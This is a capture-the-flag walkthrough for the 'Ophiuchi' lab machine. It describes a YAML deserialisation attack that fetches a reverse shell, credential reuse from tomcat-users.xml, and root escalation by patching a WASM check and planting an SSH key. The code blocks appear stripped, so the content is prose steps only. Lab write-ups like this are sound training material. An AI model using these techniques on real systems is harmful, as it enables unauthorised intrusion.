Ophiuchi
Gaining Access
Nmap scan:
YAML Parser
Port 8080 was running an application that handles YAML input.
This was obviously a deserialisation exploit, where the application handles user input without sanitsation and it can lead to code execution. Googling for this led me to this repository.
Based on the PoC, we can first test whether the parser is able to send requests to our host using this script:
And it does indeed work.
We then need to use this bit of code here to make the machine download a reverse shell and execute it.
After editing this code, we need to compile it to a JAR file using these:
This would create a JAR file. Then, we can make the machine download the JAR file using the same method as above to receive callback. This would trigger the command and our listener port would receive a reverse shell as tomcat
.
Privilege Escalation
Tomcat Credentials
Since we are tomcat
, we should look into the configurations for the Tomcat interface. This can be found within ~/conf/tomcat-users.xml
.
We can try an su
to the admin
user and find that it works with this password.
Sudo Privileges
Since we have the password, we can check for sudo
privileges.
Seems that we can run go
on a certain script:
The deploy.sh
does not have absolute path, so we can create our own script to get a root
shell. However, before running that, the script seems to check main.wasm
and only runs deploy.sh
if it returns 1.
Running the script does not work no matter what for now, so let's investigate main.wasm
. WASM is short for Web Assembly, and we can download and decompile the file here:
This would allow us to see the code that is present. Alternatively, we can use wasm-decompile
to read it.
The above code seems to do nothing but return 0, so we need to change that 0 to a 1. We can count the bytes and change the byte accordingly using dd
.
Afterwards, we can create a deploy.sh
file that adds our public key into the /root/.ssh/authorized_key
folder and run the sudo
command.
This would allow us to SSH in as root
.